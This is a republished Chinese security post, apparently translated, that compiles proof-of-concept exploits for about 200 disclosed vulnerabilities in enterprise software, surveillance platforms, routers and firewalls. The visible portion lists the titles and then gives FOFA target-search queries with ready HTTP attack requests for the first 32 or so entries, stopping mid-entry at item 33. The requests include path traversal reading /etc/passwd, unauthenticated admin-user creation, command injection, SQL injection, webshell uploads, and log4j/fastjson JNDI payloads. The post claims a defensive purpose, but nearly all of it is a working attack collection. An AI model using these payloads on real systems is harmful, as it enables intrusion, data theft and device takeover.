Compilation of publicly disclosed internet vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive and defensive security engagements; we hope this article helps with your defense. Defenders can use its contents to check their own exposure.

Vulnerability sources: This article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024; all come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities listed are public; for patches or remediation, contact the product vendor.

Content: Because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if needed.

Legal rights: If the content infringes any party's legitimate rights, contact the 网络安全新视界 team via the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete list as it stands; press F12 and search for keywords when using it.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Table of Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo endpoint SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent lecture-capture system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload endpoint file upload
200. SeaCMS dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"
Set password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the backend with the default account admin, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=cookie obtained from the login in step one
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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m
Host: x.x.x.x

The payload is the following statement, double URL-encoded

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the injected code executes a command passed base64-encoded in a request header
POST /session/login H HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Send the following request to the target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
 <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
 </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
 }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
 }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
